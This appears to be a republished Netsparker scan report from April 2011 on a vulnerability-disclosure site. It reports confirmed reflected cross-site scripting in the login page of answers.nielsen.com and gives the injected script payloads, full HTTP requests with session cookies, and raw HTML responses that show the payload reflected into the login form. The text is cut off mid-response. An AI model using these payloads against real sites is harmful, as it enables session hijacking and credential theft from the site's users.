answers.nielsen.com, Netsparker, DORK GHDB REPORT SUMMARY
Public Domain Vulnerability Information, Security Articles, Vulnerability Reports, GHDB, DORK Search
XSS Crawler | SQLi Crawler | HTTPi Crawler | FI Crawler
Loading
Netsparker - Scan Report Summary
TARGET URL
https://answers.nielsen.com/gateway/logon.htm...
SCAN DATE
4/29/2011 12:59:38 PM
REPORT DATE
4/29/2011 1:07:11 PM
SCAN DURATION
00:04:51
11
identified
9
confirmed
0
critical
2
informational
GHDB DORK Tests
Scan Settings
PROFILE
Previous Settings
ENABLED ENGINES
Cross-site Scripting
Authentication
Scheduled
GHDB, DORK VULNERABILITIES
Vulnerabilities
GHDB, DORK VULNERABILITY SUMMARY
Vulnerability Summary
Cross-site Scripting
Cross-site Scripting
XSS (Cross-site Scripting) allows an attacker to execute a dynamic script (
Javascript, VbScript ) in the context of the application. This allows several different attack opportunities, mostly hijacking the current session of the user or changing the look of the page by changing the HTML on the fly to steal the user's credentials. This happens because the input entered by a user has been interpreted as HTML/Javascript/VbScript by the browser.
XSS targets the users of the application instead of the server. Although this is a limitation, since it allows attackers to hijack other users' session, an attacker might attack an administrator to gain full control over the application.
Impact
There are many different attacks that can be leveraged through the use of XSS, including:
Hi-jacking users' active session
Changing the look of the page within the victims browser.
Mounting a successful phishing attack.
Intercept data and perform man-in-the-middle attacks.
The issue occurs because the browser interprets the input as active HTML, Javascript or VbScript. To avoid this, all input and output from the application should be filtered. Output should be filtered according to the output format and location. Typically the output location is HTML. Where the output is HTML ensure that all active content is removed prior to its presentation to the server.
Prior to sanitizing user input, ensure you have a pre-defined list of both expected and acceptable characters with which you populate a white-list. This list needs only be defined once and should be used to sanitize and validate all subsequent input.
There are a number of pre-defined, well structured white-list libraries available for many different environments, good examples of these include, OWASP Reform and Microsoft Anti Cross-site Scripting libraries are good examples.
External References
- /gateway/logon.htm'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000689)%3C/script%3E
Parameters
Parameter
Type
Value
TYPE
GET
33619969
REALMOID
GET
06-0008fcbc-145a-1be3-b1b7-05e50a27c0f4
GUID
GET
SMAUTHREASON
GET
0
METHOD
GET
GET
SMAGENTNAME
GET
-SM-N/X3w2PnaN8cBlony5gQcMZ+2Q9Cxhjqwa3V8AR0lLW5sdY0cl8Av6tvJ0zGxzYJ
TARGET
GET
-SM-https://answers.nielsen.com/portal/site/'"----></style></script><script>netsparker(0x000689)</script>
URI-BASED
Raw URI
'"--></style></script><script>alert(0x000689)</script>
Request
GET /gateway/logon.htm?TYPE=33619969&REALMOID=06-0008fcbc-145a-1be3-b1b7-05e50a27c0f4&GUID=&SMAUTHREASON=0&METHOD=GET&SMAGENTNAME=-SM-N%2fX3w2PnaN8cBlony5gQcMZ%2b2Q9Cxhjqwa3V8AR0lLW5sdY0cl8Av6tvJ0zGxzYJ&TARGET=-SM-https%3a%2f%2fanswers%2enielsen%2ecom%2fportal%2fsite%2f'%22----%3E%3C%2fstyle%3E%3C%2fscript%3E%3Cscript%3Enetsparker(0x000689)%3C%2fscript%3E HTTP/1.1 Referer: https://answers.nielsen.com/portal/site/ User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Cache-Control: no-cache Host: answers.nielsen.com Cookie: answers_cookie=R868046967; GATEWAYSESSION=3pQsN68Ds9pFQn2lswbFflkzpJJRQQp9ZnnRFD2l4TGSvLLHtG4T!-271814052 Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK Set-Cookie: answers_cookie=R868046967; path=/; expires=Fri, 29-Apr-2011 23:52:34 GMT,session_invalidated=; domain=.nielsen.com; expires=Thursday, 01-Jan-1970 01:00:00 GMT; path=/ Date: Fri, 29 Apr 2011 18:00:02 GMT Server: Apache Cache-Control: no-cache="set-cookie" X-Powered-By: Servlet/2.5 JSP/2.1 ACNGPWS: 03 Proxy-Connection: keep-alive P3P: policyref="http://answers.nielsen.com/legal/p3p.xml", CP="CAO DSP COR CURa ADMi DEVi IVAi OUR NOR STP IND PHY ONL UNI COM NAV INT DEM CNT PRE" Transfer-Encoding: chunked Content-Type: text/html; charset=utf-8 <html> <head> <title>Nielsen Answers</title> <style> body, td { /* SET FONT FOR ALL BROWSERS */ font-family: Arial, Helvetica, sans-serif; font-size: 11px; color: #333; } body, tr, .ni-heading1, .ni-heading2, .ni-heading3, .ni-heading4, .ni-definition-list, .ni-ordered-list, .ni-unordered-list, .ni-unordered-list-no-pad, .ni-body-text, .ni-body-text-2, .ni-form-label, .ni-error-text, .ni-footer { text-align: left; color: #7E7E7E; line-height: 1.6; font-family: Arial, Helvetica, sans-serif; font-size: 11px; } img { border: none; } .ni-link img, .ni-link .ni-img { border: none; } .ni-link, .ni-link:link, .ni-link:visited { color: #545763; font-weight: bold; text-decoration: none; } .ni-link2, .ni-link2:link, .ni_link2:visited { color: #00A2ED; text-decoration: none; } .ni-active, .ni-active:link, .ni-active:visited { color: #02A2EC } .ni-link:hover, .ni-link2:hover, .ni-active:hover { color: #43BAF1; } .ni-error, .ni-information, .ni-helptext { padding: 9px 9px 0; margin-bottom: 9px; background: white; } .ni-error { border: 1px solid red; color: #c00; } .ni-error-text { color: #c00; margin: 0 0 9px; } .ni-information, .ni-helptext { border: 1px solid #D7D8DC; background-color: #EFF0F2; } .ni-unordered-list, .ni-unordered-list ul, .ni-unordered-list-no-pad, .ni-unordered-list-no-pad ul { list-style-type: square; font-weight: bold; padding: 0; color: #666; margin: 0 0 9px 19px; } .ni-unordered-list-no-pad, .ni-unordered-list-no-pad ul { margin: 0 0 0px 19px; } .ni-unordered-list ul { margin-bottom: 0; margin-left: 13px; } .ni-unordered-list li { padding: 0px;; } .ni-uordered-list-chevron, .ni-uordered-list-chevron ul { list-style-type: none; margin: 0 0 9px 5px; } .ni-uordered-list-chevron li { background: transparent url("/gateway/images/answers_ui/ni-chevron.gif") no-repeat left 4px; padding-left: 15px; } .ni-uordered-list-chevron ul { margin-left: 0; } .ni-ordered-list, .ni-ordered-list ol { padding-left: 5px; margin: 0 0 9px 19px; } .ni-ordered-list ol { margin-bottom: 0; } .ni-definition-list { margin: 0; } .ni-definition-list dt { font-weight: bold; margin: 0; } .ni-definition-list dd { font-weight: normal; margin: 0; } .ni-heading1 { font-weight: bold; font-size: 20px; display: block; margin: 0 0 9px; line-height: 1.1; } .ni-heading2 { font-size: 16px; font-weight: normal; display: block; margin: 0 0 9px; line-height: 1.3; } .ni-heading3 { font-size: 12px; font-weight: bold; color: #666; display: block; margin: 0; } .ni-heading4 { font-size: 11px; font-weight: bold; color: #000; display: block; margin: 0 0 9px; } .ni-body-text { margin: 0 0 9px; font-weight: normal; } .ni-body-text-2 { margin: 0; font-weight: normal; } .ni-strong { font-weight: bold; } .ni-emphasis { font-weight: normal; font-style: italic; } .ni-heading4 { } .ni-hr { height: 1px; margin: 1.2em 0; background: #333; color: #333; border: 0; clear: both; } .ni-hr-2 { height: 1px; margin: .5em 0; background: #333; color: #333; border: 0; clear: both; } .ni-border-top { border-top: solid 1px #333 } .ni-br { width: 100%; clear: both; } /* Form Elements ---------------------------------------------------------*/ .ni-form { margin: 0; } .ni-form-table { margin: 0; } .ni-form-required { color: #F68421; } .ni-form-label { font-size: 11px; text-align: right; vertical-align: top; } .ni-form-label-t-left { font-size: 11px; text-align: left; vertical-align: middle; } .ni-form-label-v-middle { font-size: 11px; text-align: right; vertical-align: middle; } .ni-form-label-spacer { width: 6px; } .ni-form-element { vertical-align: top; } .ni-form-text-input { border: 1px solid #BDBEC1; background-color: #f5f5f6; padding: 2px 3px; font-family: Arial, Helvetica, sans-serif; font-size: 11px; } .ni-form-text-input:focus { background-color: #ceedfc; } .ni-form-select { border: 1px solid #BDBEC1; background-color: #f5f5f6; font-family: Arial, Helvetica, sans-serif; font-size: 11px; color: #333; } .ni-form-checkbox { width: auto; } .ni-form-textarea { padding: 1px 3px; font-family: Arial, Helvetica, sans-serif; font-size: 11px; border: 1px solid #BDBEC1; background-color: #f5f5f6; color: #333; } .ni-form-textarea:focus { background-color: #ceedfc; } .ni-form-file { border: 1px solid #BDBEC1; font-size: 11px; font-family: Arial, Helvetica, sans-serif; } .ni-form-disabled { background-color: #dcdcdc; } /* SIMPLE BUTTONS --------------------------------------------------------*/ .ni-btn { display: inline; width: auto; } .ni-btn input { background: #41BAF2; filter:progid:DXImageTransform.Microsoft.Gradient (GradientType=0,StartColorStr='#73CCF6',EndColorStr='#02A3ED'); color: white; font-weight: bold; font-size: 11px; border: 1px solid #0071BF; padding-top: 1px; padding-bottom: 1px; } .ni-btn-disabled input { background: #B5E4FA; border: 1px solid #5CC3F3; color: white !important; filter:progid:DXImageTransform.Microsoft.Gradient (GradientType=0,StartColorStr='#CFEEFC',EndColorStr='#96DDF9'); } .ni-btn-dark input { background: #2594D9; border: 1px solid #0071BF !important; filter:progid:DXImageTransform.Microsoft.Gradient (GradientType=0,StartColorStr='#43A3DD',EndColorStr='#0277D4'); } .ni-btn-green input { background: #2594D9; border: 1px solid #0071BF !important; filter:progid:DXImageTransform.Microsoft.Gradient (GradientType=0,StartColorStr='#43A3DD',EndColorStr='#0277D4'); } /* Table Elements --------------------------------------------------------*/ .ni-chrome-head { width:100%; } .ni-table { border: 1px solid black !important; border-collapse: collapse; clear: both; } .ni-row-head, .ni-row-head th { vertical-align: bottom; padding: 2px 7px; border: 1px solid #000; border-right: 1px solid #bebec0; border-left: 1px solid #bebec0; background-color: #eee; font: normal normal bold 12px Arial, Helvetica, sans-serif; color: #000; } .ni-row-head-link, .ni-row-head-link:link, .ni-row-head-link:visited { font: normal normal bold 12px Arial, Helvetica, sans-serif; color: #000; text-decoration: none; } .ni-row-head-link:hover { color: #43BAF1; } .ni-row-even, .ni-row-even td { background-color: #eee; font: normal normal normal 11px Arial, Helvetica, sans-serif; } .ni-row-odd, .ni-row-odd td { background-color: #fff; font: normal normal normal 11px Arial, Helvetica, sans-serif; } .ni-table-cell { vertical-align: middle; padding: 2px 7px; border: 1px solid #bebec0; color: #000; text-align: center; } table .ni-table-cell-left { text-align: left; } table .ni-table-cell-right { text-align: right; } table .ni-table-cell-center { text-align: center; } .ni-table .ni-link { font-weight: bold; color: #545763; } .ni-table .ni-user { font-weight: normal; } /* standard colored buttons ----------------------------------------------*/ .ni-btn-link, .ni-btn-link-active, .ni-btn-link-disabled { /*position: relative !important;*/ font: 11px arial, helvetica, sans-serif; font-weight: bold; text-decoration: none; line-height: 200%; *line-height: 100% !important; /*patch for ie6 problems*/ *vertical-align: 0px; *padding: 0; /*border: 1px solid green;*/ } /*active state*/ .ni-btn-link:active { background-position: 100% -75px; text-decoration: none; } .ni-btn-link-active { background-position: 100% -75px !important; } .ni-btn-link:active span { background-position: 100% -75px !important; text-decoration: none; } .ni-btn-link-active span { background-position: 100% -75px !important; } .ni-btn-link:active span span { background-position: 0 -75px !important; text-decoration: none; } .ni-btn-link-active span span { background-position: 0 -75px !important; } /*disabled state*/ .ni-btn-link-disabled { cursor:default !important; } .ni-btn-link-disabled { background-position: 100% -50px !important; } .ni-btn-link-disabled span { background-position: 100% -50px !important; } .ni-btn-link-disabled span span { background-position: 0 -50px !important; } /*hover state*/ .ni-btn-link:hover { background-position: 100% -25px; text-decoration: none; } .ni-btn-link:hover span { background-position: 100% -25px; text-decoration: none; } .ni-btn-link:hover span span { background-position: 0 -25px; text-decoration: none; } /* light colored buttons ------------------------*/ .ni-btn-body-light { background: transparent url("/gateway/images/buttons/ni-btn-bg2.gif"); background-repeat: repeat-x; background-position: left top; padding: 3px 0px 5px 0px; height: 20px !important; display:inline; color: #fff; cursor: hand; *padding: 0px 0px 0px 0px !important; /*patch for ie problems*/ *line-height: 1.8; *vertical-align: 3px; *display: inline-block; } .ni-btn-link-disabled .ni-btn-body-light { background-position: left -50px; } .ni-btn-left-light { background: transparent url("/gateway/images/buttons/ni-btn-bg1.gif") no-repeat left top; padding: 3px 0px 5px 5px; height: 20px; cursor: hand; *padding: 0 0 0 5px !important; /*patch for ie problems*/ } .ni-btn-link-disabled .ni-btn-left-light { padding: 3px 0px 5px 5px; background-position: left -50px; *padding: 0 0 0 5px !important; /*patch for ie problems*/ } .ni-btn-right-light { background: transparent url("/gateway/images/buttons/ni-btn-onblue-bg3.gif") no-repeat right top; padding: 3px 5px 5px 0; height: 20px; cursor: hand; *zoom: 1; /*hack for ie problems*/ *padding: 0px 5px 0px 0px !important; } .ni-btn-link-disabled .ni-btn-right-light { padding: 3px 5px 5px 0; background-position: right -50px; *padding: 0 5px 0 0 !important; /*hack for ie problems*/ } /* dark colored buttons -------------------------*/ .ni-btn-body-dark { background: transparent url("/gateway/images/buttons/ni-btn-or-bg2.gif") repeat-x left top; padding: 3px 0px 5px 0px; height: 20px !important; display: inline; color: #fff; cursor: hand; *padding: 0px 0px 0px 0px !important; /*patch for ie problems*/ *line-height: 1.8; *vertical-align: 3px; *display: inline-block; } .ni-btn-link-disabled .ni-btn-body-dark { background-position: left -50px; } .ni-btn-left-dark { background: transparent url("/gateway/images/buttons/ni-btn-or-bg1.gif") no-repeat left top; padding: 3px 0px 5px 5px; height: 20px; *padding: 0 0 0 5px !important; /*patch for ie problems*/ } .ni-btn-link-disabled .ni-btn-left-dark { background-position: left -50px; } .ni-btn-right-dark { background: transparent url("/gateway/images/buttons/ni-btn-or-onblue-bg3.gif") no-repeat right top; padding: 3px 5px 5px 0; height: 20px; *zoom: 1; /*hack for ie problems*/ *padding: 0 5px 0 0 !important; /*hack for ie problems*/ } .ni-btn-link-disabled .ni-btn-right-dark { background-position: right -50px; } .ni-btn-left-cancel { background: url(/gateway/images/buttons/ni-btn-cancel-onblue.gif) no-repeat left top; padding: 3px 0px 5px 21px; *padding: 0px 0px 0px 21px !important; /*hack for ie problems*/ } /* These blocks are for displaying buttons -------------------------------*/ .white { padding: 20px 0; margin: 10px; background: #fff; border: 1px solid #999; overflow: hidden; } .blue { padding: 20px 0; margin: 10px; background: #A4DEF9; border: 1px solid #999; overflow: hidden; } /* Added new styles to display error messages in the Login page*/ .ni-logon-success-text { color: #009900 !important } .ni-logon-message-text { color: #0000ff !important } .ni-logon-body-text { color: #000000 !important } .ni-logon-error-text { color: #ff0000 !important } </style> <style> .ni-login-div{ height:101px; margin:70px 0px 0px 35px; *margin:70px 20px 0px auto; } </style> </head> <body> <table style="height:100%;width:100%;"> <tr> <td style="text-align:center;vertical-align:middle;"> <div style="width:380px;margin:auto;"> <table xmlns:fo="http://www.w3.org/1999/XSL/Format" border="0" cellspacing="0" cellpadding="0"></table> </div> <div style="border:1px solid #FFFFFF;height:189px;width:380px;margin:auto;background: transparent url('/gateway/images/answers_ui/bg_login.png') no-repeat left top;"> <form class="ni-form" action="/gateway/forms/login.fcc" method="post" name="login_form" AUTOCOMPLETE="ON" styleId="login_form"> <input type="hidden" name="realm" value="06-0008fcbc-145a-1be3-b1b7-05e50a27c0f4"> <input type="hidden" name="target" value="https://answers.nielsen.com/portal/site/'"--></style></script><script>netsparker(0x000689)</script>"> <input type="hidden" name="SMAUTHREASON" value="0"> <input type="hidden" name="password" value=" "> <table class="ni-form-table ni-login-div"> <tr></tr> <tr></tr> <tr> <td class="ni-form-label" style="white-space:nowrap;">Email:</td> <td class="ni-form-label-spacer"> </td> <td class="ni-form-element"><input style="width:210px;" class="ni-form-text-input" id="logon" name="USER" type="text" AUTOCOMPLETE="ON" /></td> </tr> <tr> <td class="ni-form-label" style="white-space:nowrap;">Password:</td> <td class="ni-form-label-spacer"> </td> <td class="ni-form-element"><input style="width:100px;" class="ni-form-text-input" id="temp_password" name="PASSWORD" type="password" AUTOCOMPLETE="ON" /></td> </tr> <tr> <td class="ni-form-label-spacer"> </td> <td> </td> <td style="text-align:right;"> <a href="#" class="ni-btn-link" onMousedown="this.className='ni-btn-link-active';return false;" onMouseout="this.className='ni-btn-link';return false;" onMouseup="this.className='ni-btn-link';return false;" onClick="document.forms.login_form.submit()" ><span class="ni-btn-right-light"><span class="ni-btn-left-light"><span class="ni-btn-body-light">Login</span></span></span></a><input type="submit" value="submit" style="position:absolute;left:-2000px;"/> </td> </tr> </table> </form> </div> <div style="width:380px;margin:auto;"> <ul class="ni-unordered-list ni-uordered-list-chevron" style="width:inherit;margin-top:1px;padding-left:5px;"> <..
Parameters
Parameter
Type
Value
TYPE
GET
33619969
REALMOID
GET
'"--></style></script><script>alert(0x0006AC)</script>
GUID
GET
3
SMAUTHREASON
GET
0
METHOD
GET
GET
SMAGENTNAME
GET
-SM-N/X3w2PnaN8cBlony5gQcMZ+2Q9Cxhjqwa3V8AR0lLW5sdY0cl8Av6tvJ0zGxzYJ
TARGET
GET
-SM-https://answers.nielsen.com/portal/site/answers
Request
GET /gateway/logon.htm?TYPE=33619969&REALMOID='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0006AC)%3C/script%3E&GUID=3&SMAUTHREASON=0&METHOD=GET&SMAGENTNAME=-SM-N%2fX3w2PnaN8cBlony5gQcMZ%2b2Q9Cxhjqwa3V8AR0lLW5sdY0cl8Av6tvJ0zGxzYJ&TARGET=-SM-https%3a%2f%2fanswers%2enielsen%2ecom%2fportal%2fsite%2fanswers HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Cache-Control: no-cache Host: answers.nielsen.com Cookie: answers_cookie=R868046967; GATEWAYSESSION=3pQsN68Ds9pFQn2lswbFflkzpJJRQQp9ZnnRFD2l4TGSvLLHtG4T!-271814052 Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK Set-Cookie: answers_cookie=R868046967; path=/; expires=Fri, 29-Apr-2011 23:52:34 GMT,session_invalidated=; domain=.nielsen.com; expires=Thursday, 01-Jan-1970 01:00:00 GMT; path=/ Date: Fri, 29 Apr 2011 18:00:03 GMT Server: Apache Cache-Control: no-cache="set-cookie" X-Powered-By: Servlet/2.5 JSP/2.1 ACNGPWS: 03 Proxy-Connection: keep-alive P3P: policyref="http://answers.nielsen.com/legal/p3p.xml", CP="CAO DSP COR CURa ADMi DEVi IVAi OUR NOR STP IND PHY ONL UNI COM NAV INT DEM CNT PRE" Transfer-Encoding: chunked Content-Type: text/html; charset=utf-8 <html> <head> <title>Nielsen Answers</title> <style> body, td { /* SET FONT FOR ALL BROWSERS */ font-family: Arial, Helvetica, sans-serif; font-size: 11px; color: #333; } body, tr, .ni-heading1, .ni-heading2, .ni-heading3, .ni-heading4, .ni-definition-list, .ni-ordered-list, .ni-unordered-list, .ni-unordered-list-no-pad, .ni-body-text, .ni-body-text-2, .ni-form-label, .ni-error-text, .ni-footer { text-align: left; color: #7E7E7E; line-height: 1.6; font-family: Arial, Helvetica, sans-serif; font-size: 11px; } img { border: none; } .ni-link img, .ni-link .ni-img { border: none; } .ni-link, .ni-link:link, .ni-link:visited { color: #545763; font-weight: bold; text-decoration: none; } .ni-link2, .ni-link2:link, .ni_link2:visited { color: #00A2ED; text-decoration: none; } .ni-active, .ni-active:link, .ni-active:visited { color: #02A2EC } .ni-link:hover, .ni-link2:hover, .ni-active:hover { color: #43BAF1; } .ni-error, .ni-information, .ni-helptext { padding: 9px 9px 0; margin-bottom: 9px; background: white; } .ni-error { border: 1px solid red; color: #c00; } .ni-error-text { color: #c00; margin: 0 0 9px; } .ni-information, .ni-helptext { border: 1px solid #D7D8DC; background-color: #EFF0F2; } .ni-unordered-list, .ni-unordered-list ul, .ni-unordered-list-no-pad, .ni-unordered-list-no-pad ul { list-style-type: square; font-weight: bold; padding: 0; color: #666; margin: 0 0 9px 19px; } .ni-unordered-list-no-pad, .ni-unordered-list-no-pad ul { margin: 0 0 0px 19px; } .ni-unordered-list ul { margin-bottom: 0; margin-left: 13px; } .ni-unordered-list li { padding: 0px;; } .ni-uordered-list-chevron, .ni-uordered-list-chevron ul { list-style-type: none; margin: 0 0 9px 5px; } .ni-uordered-list-chevron li { background: transparent url("/gateway/images/answers_ui/ni-chevron.gif") no-repeat left 4px; padding-left: 15px; } .ni-uordered-list-chevron ul { margin-left: 0; } .ni-ordered-list, .ni-ordered-list ol { padding-left: 5px; margin: 0 0 9px 19px; } .ni-ordered-list ol { margin-bottom: 0; } .ni-definition-list { margin: 0; } .ni-definition-list dt { font-weight: bold; margin: 0; } .ni-definition-list dd { font-weight: normal; margin: 0; } .ni-heading1 { font-weight: bold; font-size: 20px; display: block; margin: 0 0 9px; line-height: 1.1; } .ni-heading2 { font-size: 16px; font-weight: normal; display: block; margin: 0 0 9px; line-height: 1.3; } .ni-heading3 { font-size: 12px; font-weight: bold; color: #666; display: block; margin: 0; } .ni-heading4 { font-size: 11px; font-weight: bold; color: #000; display: block; margin: 0 0 9px; } .ni-body-text { margin: 0 0 9px; font-weight: normal; } .ni-body-text-2 { margin: 0; font-weight: normal; } .ni-strong { font-weight: bold; } .ni-emphasis { font-weight: normal; font-style: italic; } .ni-heading4 { } .ni-hr { height: 1px; margin: 1.2em 0; background: #333; color: #333; border: 0; clear: both; } .ni-hr-2 { height: 1px; margin: .5em 0; background: #333; color: #333; border: 0; clear: both; } .ni-border-top { border-top: solid 1px #333 } .ni-br { width: 100%; clear: both; } /* Form Elements ---------------------------------------------------------*/ .ni-form { margin: 0; } .ni-form-table { margin: 0; } .ni-form-required { color: #F68421; } .ni-form-label { font-size: 11px; text-align: right; vertical-align: top; } .ni-form-label-t-left { font-size: 11px; text-align: left; vertical-align: middle; } .ni-form-label-v-middle { font-size: 11px; text-align: right; vertical-align: middle; } .ni-form-label-spacer { width: 6px; } .ni-form-element { vertical-align: top; } .ni-form-text-input { border: 1px solid #BDBEC1; background-color: #f5f5f6; padding: 2px 3px; font-family: Arial, Helvetica, sans-serif; font-size: 11px; } .ni-form-text-input:focus { background-color: #ceedfc; } .ni-form-select { border: 1px solid #BDBEC1; background-color: #f5f5f6; font-family: Arial, Helvetica, sans-serif; font-size: 11px; color: #333; } .ni-form-checkbox { width: auto; } .ni-form-textarea { padding: 1px 3px; font-family: Arial, Helvetica, sans-serif; font-size: 11px; border: 1px solid #BDBEC1; background-color: #f5f5f6; color: #333; } .ni-form-textarea:focus { background-color: #ceedfc; } .ni-form-file { border: 1px solid #BDBEC1; font-size: 11px; font-family: Arial, Helvetica, sans-serif; } .ni-form-disabled { background-color: #dcdcdc; } /* SIMPLE BUTTONS --------------------------------------------------------*/ .ni-btn { display: inline; width: auto; } .ni-btn input { background: #41BAF2; filter:progid:DXImageTransform.Microsoft.Gradient (GradientType=0,StartColorStr='#73CCF6',EndColorStr='#02A3ED'); color: white; font-weight: bold; font-size: 11px; border: 1px solid #0071BF; padding-top: 1px; padding-bottom: 1px; } .ni-btn-disabled input { background: #B5E4FA; border: 1px solid #5CC3F3; color: white !important; filter:progid:DXImageTransform.Microsoft.Gradient (GradientType=0,StartColorStr='#CFEEFC',EndColorStr='#96DDF9'); } .ni-btn-dark input { background: #2594D9; border: 1px solid #0071BF !important; filter:progid:DXImageTransform.Microsoft.Gradient (GradientType=0,StartColorStr='#43A3DD',EndColorStr='#0277D4'); } .ni-btn-green input { background: #2594D9; border: 1px solid #0071BF !important; filter:progid:DXImageTransform.Microsoft.Gradient (GradientType=0,StartColorStr='#43A3DD',EndColorStr='#0277D4'); } /* Table Elements --------------------------------------------------------*/ .ni-chrome-head { width:100%; } .ni-table { border: 1px solid black !important; border-collapse: collapse; clear: both; } .ni-row-head, .ni-row-head th { vertical-align: bottom; padding: 2px 7px; border: 1px solid #000; border-right: 1px solid #bebec0; border-left: 1px solid #bebec0; background-color: #eee; font: normal normal bold 12px Arial, Helvetica, sans-serif; color: #000; } .ni-row-head-link, .ni-row-head-link:link, .ni-row-head-link:visited { font: normal normal bold 12px Arial, Helvetica, sans-serif; color: #000; text-decoration: none; } .ni-row-head-link:hover { color: #43BAF1; } .ni-row-even, .ni-row-even td { background-color: #eee; font: normal normal normal 11px Arial, Helvetica, sans-serif; } .ni-row-odd, .ni-row-odd td { background-color: #fff; font: normal normal normal 11px Arial, Helvetica, sans-serif; } .ni-table-cell { vertical-align: middle; padding: 2px 7px; border: 1px solid #bebec0; color: #000; text-align: center; } table .ni-table-cell-left { text-align: left; } table .ni-table-cell-right { text-align: right; } table .ni-table-cell-center { text-align: center; } .ni-table .ni-link { font-weight: bold; color: #545763; } .ni-table .ni-user { font-weight: normal; } /* standard colored buttons ----------------------------------------------*/ .ni-btn-link, .ni-btn-link-active, .ni-btn-link-disabled { /*position: relative !important;*/ font: 11px arial, helvetica, sans-serif; font-weight: bold; text-decoration: none; line-height: 200%; *line-height: 100% !important; /*patch for ie6 problems*/ *vertical-align: 0px; *padding: 0; /*border: 1px solid green;*/ } /*active state*/ .ni-btn-link:active { background-position: 100% -75px; text-decoration: none; } .ni-btn-link-active { background-position: 100% -75px !important; } .ni-btn-link:active span { background-position: 100% -75px !important; text-decoration: none; } .ni-btn-link-active span { background-position: 100% -75px !important; } .ni-btn-link:active span span { background-position: 0 -75px !important; text-decoration: none; } .ni-btn-link-active span span { background-position: 0 -75px !important; } /*disabled state*/ .ni-btn-link-disabled { cursor:default !important; } .ni-btn-link-disabled { background-position: 100% -50px !important; } .ni-btn-link-disabled span { background-position: 100% -50px !important; } .ni-btn-link-disabled span span { background-position: 0 -50px !important; } /*hover state*/ .ni-btn-link:hover { background-position: 100% -25px; text-decoration: none; } .ni-btn-link:hover span { background-position: 100% -25px; text-decoration: none; } .ni-btn-link:hover span span { background-position: 0 -25px; text-decoration: none; } /* light colored buttons ------------------------*/ .ni-btn-body-light { background: transparent url("/gateway/images/buttons/ni-btn-bg2.gif"); background-repeat: repeat-x; background-position: left top; padding: 3px 0px 5px 0px; height: 20px !important; display:inline; color: #fff; cursor: hand; *padding: 0px 0px 0px 0px !important; /*patch for ie problems*/ *line-height: 1.8; *vertical-align: 3px; *display: inline-block; } .ni-btn-link-disabled .ni-btn-body-light { background-position: left -50px; } .ni-btn-left-light { background: transparent url("/gateway/images/buttons/ni-btn-bg1.gif") no-repeat left top; padding: 3px 0px 5px 5px; height: 20px; cursor: hand; *padding: 0 0 0 5px !important; /*patch for ie problems*/ } .ni-btn-link-disabled .ni-btn-left-light { padding: 3px 0px 5px 5px; background-position: left -50px; *padding: 0 0 0 5px !important; /*patch for ie problems*/ } .ni-btn-right-light { background: transparent url("/gateway/images/buttons/ni-btn-onblue-bg3.gif") no-repeat right top; padding: 3px 5px 5px 0; height: 20px; cursor: hand; *zoom: 1; /*hack for ie problems*/ *padding: 0px 5px 0px 0px !important; } .ni-btn-link-disabled .ni-btn-right-light { padding: 3px 5px 5px 0; background-position: right -50px; *padding: 0 5px 0 0 !important; /*hack for ie problems*/ } /* dark colored buttons -------------------------*/ .ni-btn-body-dark { background: transparent url("/gateway/images/buttons/ni-btn-or-bg2.gif") repeat-x left top; padding: 3px 0px 5px 0px; height: 20px !important; display: inline; color: #fff; cursor: hand; *padding: 0px 0px 0px 0px !important; /*patch for ie problems*/ *line-height: 1.8; *vertical-align: 3px; *display: inline-block; } .ni-btn-link-disabled .ni-btn-body-dark { background-position: left -50px; } .ni-btn-left-dark { background: transparent url("/gateway/images/buttons/ni-btn-or-bg1.gif") no-repeat left top; padding: 3px 0px 5px 5px; height: 20px; *padding: 0 0 0 5px !important; /*patch for ie problems*/ } .ni-btn-link-disabled .ni-btn-left-dark { background-position: left -50px; } .ni-btn-right-dark { background: transparent url("/gateway/images/buttons/ni-btn-or-onblue-bg3.gif") no-repeat right top; padding: 3px 5px 5px 0; height: 20px; *zoom: 1; /*hack for ie problems*/ *padding: 0 5px 0 0 !important; /*hack for ie problems*/ } .ni-btn-link-disabled .ni-btn-right-dark { background-position: right -50px; } .ni-btn-left-cancel { background: url(/gateway/images/buttons/ni-btn-cancel-onblue.gif) no-repeat left top; padding: 3px 0px 5px 21px; *padding: 0px 0px 0px 21px !important; /*hack for ie problems*/ } /* These blocks are for displaying buttons -------------------------------*/ .white { padding: 20px 0; margin: 10px; background: #fff; border: 1px solid #999; overflow: hidden; } .blue { padding: 20px 0; margin: 10px; background: #A4DEF9; border: 1px solid #999; overflow: hidden; } /* Added new styles to display error messages in the Login page*/ .ni-logon-success-text { color: #009900 !important } .ni-logon-message-text { color: #0000ff !important } .ni-logon-body-text { color: #000000 !important } .ni-logon-error-text { color: #ff0000 !important } </style> <style> .ni-login-div{ height:101px; margin:70px 0px 0px 35px; *margin:70px 20px 0px auto; } </style> </head> <body> <table style="height:100%;width:100%;"> <tr> <td style="text-align:center;vertical-align:middle;"> <div style="width:380px;margin:auto;"> <table xmlns:fo="http://www.w3.org/1999/XSL/Format" border="0" cellspacing="0" cellpadding="0"></table> </div> <div style="border:1px solid #FFFFFF;height:189px;width:380px;margin:auto;background: transparent url('/gateway/images/answers_ui/bg_login.png') no-repeat left top;"> <form class="ni-form" action="/gateway/forms/login.fcc" method="post" name="login_form" AUTOCOMPLETE="ON" styleId="login_form"> <input type="hidden" name="realm" value="'"--></style></script><script>netsparker(0x0006AC)</script>"> <input type="hidden" name="target" value="https://answers.nielsen.com/portal/site/answers"> <input type="hidden" name="SMAUTHREASON" value="0"> <input type="hidden" name="password" value=" "> <table class="ni-form-table ni-login-div"> <tr></tr> <tr></tr> <tr> <td class="ni-form-label" style="white-space:nowrap;">Email:</td> <td class="ni-form-label-spacer"> </td> <td class="ni-form-element"><input style="width:210px;" class="ni-form-text-input" id="logon" name="USER" type="text" AUTOCOMPLETE="ON" /></td> </tr> <tr> <td class="ni-form-label" style="white-space:nowrap;">Password:</td> <td class="ni-form-label-spacer"> </td> <td class="ni-form-element"><input style="width:100px;" class="ni-form-text-input" id="temp_password" name="PASSWORD" type="password" AUTOCOMPLETE="ON" /></td> </tr> <tr> <td 